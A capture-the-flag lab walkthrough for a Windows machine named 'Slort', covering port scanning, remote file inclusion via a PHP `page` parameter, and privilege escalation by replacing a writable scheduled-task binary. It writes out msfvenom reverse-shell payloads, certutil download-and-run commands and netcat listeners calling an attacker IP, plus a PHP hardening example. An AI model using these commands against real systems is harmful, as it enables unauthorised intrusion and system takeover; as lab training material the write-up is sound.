# Slort

## Summary

### General information

|            |                                                 |
| ---------- | ----------------------------------------------- |
| **Level**  | <mark style="color:orange;">Intermediate</mark> |
| **System** | Windows                                         |

### Spoiler! - Roadmap

1. Among the services there is a web application with a `/site` route that redirects to `/site/index.php?page=main.php`.
2. The `page` parameter turns out to be vulnerable to RFI, and through it we include a URL pointing to our `php` `reverse shell`.
3. While enumerating the server we find in the `C:\Backup` folder the details of a task that runs a binary called `TFTP.exe` every 5 minutes, and we see that our user has permission to modify it.
4. We build an EXE with the same name as the file the task runs and replace it on the system.
5. We wait for the task to run and PWNED! }:)

## Enumeration

### nmap scan

Basic enumeration of all services over TCP, UDP and SCTP:

```bash
IP=192.168.198.53
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
```

Port and service scan with scripts against the Top 1000 ports over TCP and UDP, plus all ports over TCP:

```bash
nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP
```

#### nmap results

The second scan (`nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP`) gives us the following information:

```
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| vulners: 
|   cpe:/a:filezilla-project:filezilla_server:0.9.41_beta: 
|       VMSA-2008-0016.3        10.0    https://vulners.com/vmware/VMSA-2008-0016.3
|       VMSA-2008-0014.3        10.0    https://vulners.com/vmware/VMSA-2008-0014.3
|       SSV:3950        10.0    https://vulners.com/seebug/SSV:3950     *EXPLOIT*
|       SSV:11998       10.0    https://vulners.com/seebug/SSV:11998    *EXPLOIT*
|       SAINT:D25EA3A9ECECCE0EAAD76756E80C2619  10.0    https://vulners.com/saint/SAINT:D25EA3A9ECECCE0EAAD76756E80C2619        *EXPLOIT*
|       SAINT:98424EE013ADB3A8F0D1BE842CCABF10  10.0    https://vulners.com/saint/SAINT:98424EE013ADB3A8F0D1BE842CCABF10        *EXPLOIT*
|       SAINT:630A6964630CDBFFE209380927EB5D13  10.0    https://vulners.com/saint/SAINT:630A6964630CDBFFE209380927EB5D13        *EXPLOIT*
|       SAINT:09352C87FBB0235129E935BA72121479  10.0    https://vulners.com/saint/SAINT:09352C87FBB0235129E935BA72121479        *EXPLOIT*
|       D2SEC_JAVAWS2   10.0    https://vulners.com/d2/D2SEC_JAVAWS2    *EXPLOIT*
|       VMSA-2009-0005  9.3     https://vulners.com/vmware/VMSA-2009-0005
|       VMSA-2008-0018  9.3     https://vulners.com/vmware/VMSA-2008-0018
|       SSV:5025        9.3     https://vulners.com/seebug/SSV:5025     *EXPLOIT*
|       SSV:5005        9.3     https://vulners.com/seebug/SSV:5005     *EXPLOIT*
|       SSV:4423        9.3     https://vulners.com/seebug/SSV:4423     *EXPLOIT*
|       VMSA-2009-0007  7.5     https://vulners.com/vmware/VMSA-2009-0007
|       SSV:3423        7.5     https://vulners.com/seebug/SSV:3423     *EXPLOIT*
|       SSV:3166        7.5     https://vulners.com/seebug/SSV:3166     *EXPLOIT*
|       PACKETSTORM:64260       7.5     https://vulners.com/packetstorm/PACKETSTORM:64260       *EXPLOIT*
|       VMSA-2008-0019.1        7.2     https://vulners.com/vmware/VMSA-2008-0019.1
|       SSV:4528        7.2     https://vulners.com/seebug/SSV:4528     *EXPLOIT*
|       SSV:3948        7.2     https://vulners.com/seebug/SSV:3948     *EXPLOIT*
|       VMSA-2009-0015  6.9     https://vulners.com/vmware/VMSA-2009-0015
|       SSV:4422        6.9     https://vulners.com/seebug/SSV:4422     *EXPLOIT*
|       SSV:14961       6.9     https://vulners.com/seebug/SSV:14961    *EXPLOIT*
|       SSV:12550       6.9     https://vulners.com/seebug/SSV:12550    *EXPLOIT*
|       SSV:12541       6.9     https://vulners.com/seebug/SSV:12541    *EXPLOIT*
|       VMSA-2009-0006  6.8     https://vulners.com/vmware/VMSA-2009-0006
|       SSV:12093       6.8     https://vulners.com/seebug/SSV:12093    *EXPLOIT*
|       CLOUDBURST      6.8     https://vulners.com/canvas/CLOUDBURST   *EXPLOIT*
|       SSV:9178        5.0     https://vulners.com/seebug/SSV:9178     *EXPLOIT*
|       SSV:9168        5.0     https://vulners.com/seebug/SSV:9168     *EXPLOIT*
|       SSV:9165        5.0     https://vulners.com/seebug/SSV:9165     *EXPLOIT*
|       SSV:86539       5.0     https://vulners.com/seebug/SSV:86539    *EXPLOIT*
|       SSV:65607       5.0     https://vulners.com/seebug/SSV:65607    *EXPLOIT*
|       SSV:3949        5.0     https://vulners.com/seebug/SSV:3949     *EXPLOIT*
|       SSV:17308       5.0     https://vulners.com/seebug/SSV:17308    *EXPLOIT*
|       PACKETSTORM:68500       5.0     https://vulners.com/packetstorm/PACKETSTORM:68500       *EXPLOIT*
|       PACKETSTORM:68473       5.0     https://vulners.com/packetstorm/PACKETSTORM:68473       *EXPLOIT*
|       PACKETSTORM:68471       5.0     https://vulners.com/packetstorm/PACKETSTORM:68471       *EXPLOIT*
|       EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF    5.0     https://vulners.com/exploitpack/EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF  *EXPLOIT*
|       EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D  *EXPLOIT*
|       EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095    5.0     https://vulners.com/exploitpack/EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095  *EXPLOIT*
|       EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D  *EXPLOIT*
|       EDB-ID:6130     5.0     https://vulners.com/exploitdb/EDB-ID:6130       *EXPLOIT*
|       EDB-ID:6123     5.0     https://vulners.com/exploitdb/EDB-ID:6123       *EXPLOIT*
|       EDB-ID:6122     5.0     https://vulners.com/exploitdb/EDB-ID:6122       *EXPLOIT*
|       E-193   5.0     https://vulners.com/dsquare/E-193       *EXPLOIT*
|       D2SEC_VMWARE_DIRTRAV    5.0     https://vulners.com/d2/D2SEC_VMWARE_DIRTRAV     *EXPLOIT*
|       D2SEC_VMWARE    5.0     https://vulners.com/d2/D2SEC_VMWARE     *EXPLOIT*
|       SSV:11498       4.0     https://vulners.com/seebug/SSV:11498    *EXPLOIT*
|_      SSV:3947        2.1     https://vulners.com/seebug/SSV:3947     *EXPLOIT*
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GenericLines, JavaRMI, LDAPBindReq, NULL: 
|_    Host '192.168.45.5' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:4443/dashboard/
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5040/tcp  open  unknown
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:8080/dashboard/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.198.53:8080/dashboard/javascripts/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.198.53:8080/dashboard/javascripts/?C=M%3BO%3DA%27%20OR%20sqlspider
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-open-proxy: Proxy might be redirecting requests
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=3/4%Time=64038037%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,4B,"G\0
SF:\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/4%OT=21%CT=1%CU=43728%PV=Y%DS=3%DC=T%G=Y%TM=64038244
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=99A7%RUD=G)IE(R=N)

Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb2-time: 
|   date: 2023-03-04T17:33:55
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
```

### Scan analysis

#### HTTP - 4443

Among the detected services, the most common ones, such as web services and others (ftp, smb, etc.), are usually the most interesting, and it is recommended to analyse them first.

```
http://192.168.198.53:4443/
```

<figure><img src="/files/ZwcyKr3N6pUcaTwhyCi1" alt=""><figcaption></figcaption></figure>

### Directory enumeration

We enumerate directories and possible files with the `html`, `php` and `txt` extensions using the `directory-list-2.3-medium.txt` wordlist:

```bash
IP=192.168.198.53
feroxbuster -t 200 -L 2 -d 2 -u http://$IP:4443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt --extract-links -o $IP-directory-list-2.3-medium-443.txt -k
```

<figure><img src="/files/6f9Fy4dNVOWw6tkxSpCi" alt=""><figcaption></figcaption></figure>

Accessing the `/site` route redirects to [`http://192.168.205.53:4443/site/index.php?page=main.php`](http://192.168.205.53:4443/site/index.php?page=main.php).

The `page` parameter references a document stored on the web server, and it is possible that this input is not sanitised, making it vulnerable to LFI (Local File Inclusion) or RFI (Remote File Inclusion).

Since an RFI would be far more useful to us, because it would let us run a webshell and/or a reverse shell, we first test whether it is vulnerable to RFI.

First, we try a simple single quote to observe how it handles this input:

```
http://192.168.205.53:4443/site/index.php?page=%27
```

{% tabs %}
{% tab title="Request" %}

```
GET /site/index.php?page=%27 HTTP/1.1
Host: 192.168.205.53:4443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


```

{% endtab %}

{% tab title="Response" %}

```
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 21:20:55 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Content-Length: 316
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  include('): failed to open stream: No such file or directory in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>:  include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />

```

{% endtab %}
{% endtabs %}

<figure><img src="/files/suyVAofdUnFDi0f67oH4" alt=""><figcaption></figcaption></figure>

Indeed, the parameter is not properly sanitised and we can see that the PHP `include` function is used, so we will try to include a file hosted on our own machine (RFI). Specifically, we will create a `reverse shell` and set a port listening.
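As an added illustration (not the lab's real `index.php`, which the writeup never shows), the following reconstructs the `include()` pattern the warning above betrays and places a hardened version next to it that resolves `page` against an allowlist; `PAGE_DIR` and `ALLOWED_PAGES` are assumptions:

```php
<?php
declare(strict_types=1);

// Added example, not the lab's source. The warning "include(): Failed opening '''
// for inclusion ... index.php on line 4" implies the pattern in
// render_page_vulnerable(); render_page_hardened() is one way to fix it.

// --- Vulnerable form: the raw `page` value becomes the include() operand.
// With allow_url_include=On a URL is fetched and executed (RFI); with it Off
// the same line still reads arbitrary local files (LFI).
function render_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'main.php';
    include $page;
}

// --- Hardened form: map `page` to a fixed set of template names and build the
// path ourselves, so user input never reaches include() directly.
const PAGE_DIR = __DIR__ . '/pages';            // assumption: templates live here
const ALLOWED_PAGES = ['main', 'about', 'contact']; // assumption: the site's pages

function resolve_page(string $requested): ?string
{
    // basename() drops any directory part, so "../x", "C:\..\x" and
    // "http://attacker/x.php" all collapse to a bare name before the checks.
    $name = basename($requested, '.php');
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        return null;
    }
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . DIRECTORY_SEPARATOR . $name . '.php');
    // realpath() returns false for a missing file; the prefix check rejects
    // anything (e.g. a symlink) that resolves outside PAGE_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(array $get): void
{
    $requested = $get['page'] ?? 'main';
    $path = is_string($requested) ? resolve_page($requested) : null;
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $path;
}

// Defence in depth: keep allow_url_include=Off in php.ini so include() can never
// fetch http:// or ftp:// targets even if a bug like the one above returns.
render_page_hardened($_GET);
```

With the hardened version, `?page=%27` and `?page=http://192.168.45.5/test.php` both return a 404 instead of reaching `include()`, and the server no longer leaks its filesystem path in a warning.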

## Exploitation

### RFI - Remote File Inclusion

Now that we have found a possible entry point, we create our reverse shell.

{% hint style="warning" %}
**Friendly reminder:** Whenever possible, use ports 53, 80 or 443. On these ports it is less likely that the `firewall` blocks the connection, so the `reverse shell` is more likely to succeed.
{% endhint %}

```
msfvenom -p php/reverse_php LHOST=192.168.45.5 LPORT=443 -f raw > test.php
```

```
python3 -m http.server 80
```

<figure><img src="/files/U086RU414fFwjml0FxmF" alt=""><figcaption></figcaption></figure>

```
sudo rlwrap nc -lnvp 443
```

<figure><img src="/files/FIIJ9Etuq3OKJLF5a43a" alt=""><figcaption></figcaption></figure>

```
http://192.168.205.53:4443/site/index.php?page=http://192.168.45.5/test.php
```

<figure><img src="/files/ffpPfqcOkOYvxOTtEb8N" alt=""><figcaption></figcaption></figure>

And... PWNED! 8)

<figure><img src="/files/G6SuShmqmPd6l0LswwHZ" alt=""><figcaption></figcaption></figure>

Now, to get a better `cmd`, we are going to upload an EXE. To do so, we use `msfvenom` again:

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.5 LPORT=53 -f exe > r.exe
python3 -m http.server 80
```

<figure><img src="/files/00mCoouNutRUooxRjTM4" alt=""><figcaption></figcaption></figure>

We set port `53` listening:

```
sudo rlwrap nc -lnvp 53
```

On the victim machine we run the following to download the EXE and then execute it.

```
certutil.exe -urlcache -split -f "http://192.168.45.5/r.exe"
r.exe
```

<figure><img src="/files/ugsgd020UbDlXsQuq1Fg" alt=""><figcaption></figcaption></figure>

When running it, we see that we get a better `cmd`:

<figure><img src="/files/FHxodkM0Pk6LjYJhuAMJ" alt=""><figcaption></figcaption></figure>

## Privilege escalation

Before resorting to automated enumeration, we take a quick look around the system and enumerate manually.

### Scheduled task every 5 minutes

In `C:\` we see a `Backup` folder. Looking at the information in its files, we see that an EXE is executed every 5 minutes.

```
cd C:\ && dir
cd Backup && dir
```

<figure><img src="/files/6MCvY2VOKnxFV9q3nY7d" alt=""><figcaption></figcaption></figure>

### Binary with write permissions

```
type backup.txt
type info.txt
```

<figure><img src="/files/hUf6wwHd3G29oCJmFnEg" alt=""><figcaption></figcaption></figure>

Let's look at the permissions on that executable in case we have write permission to replace it with an executable of our own.

```
powershell -c "Get-Acl TFTP.exe | fl"
```

<figure><img src="/files/NiHIrcx8zaK5ZA6kbTgy" alt=""><figcaption></figcaption></figure>

### Creating the malicious binary

Since we have permission to modify the file, we create a file called `TFTP.exe` with `msfvenom` containing our reverse shell and then swap it for the one on the system.

```bash
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.5 LPORT=80 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o TFTP.exe
```

<figure><img src="/files/bzS6OSGZNeo4CHTzdrLH" alt=""><figcaption></figcaption></figure>

### Replacing and uploading the malicious binary

On the victim machine we rename `TFTP.exe` to `TFTP.exe.bak` so as not to delete it, and download our malicious EXE.

```
move TFTP.exe TFTP.exe.bak
certutil.exe -urlcache -split -f "http://192.168.45.5/TFTP.exe"
```

<figure><img src="/files/XwJ0xD4jqrq1xThpMH60" alt=""><figcaption></figcaption></figure>

Remember to stop the `python` HTTP server we used to serve the EXE, and set port 80 listening to get our shell:

```
sudo rlwrap nc -lnvp 80
```

We wait 5 minutes and... PWNED!

<figure><img src="/files/k5zepkmtLpcK3MDwE13M" alt=""><figcaption></figcaption></figure>

```
type C:\Users\rupert\Desktop\local.txt
type C:\Users\Administrator\Desktop\proof.txt
```

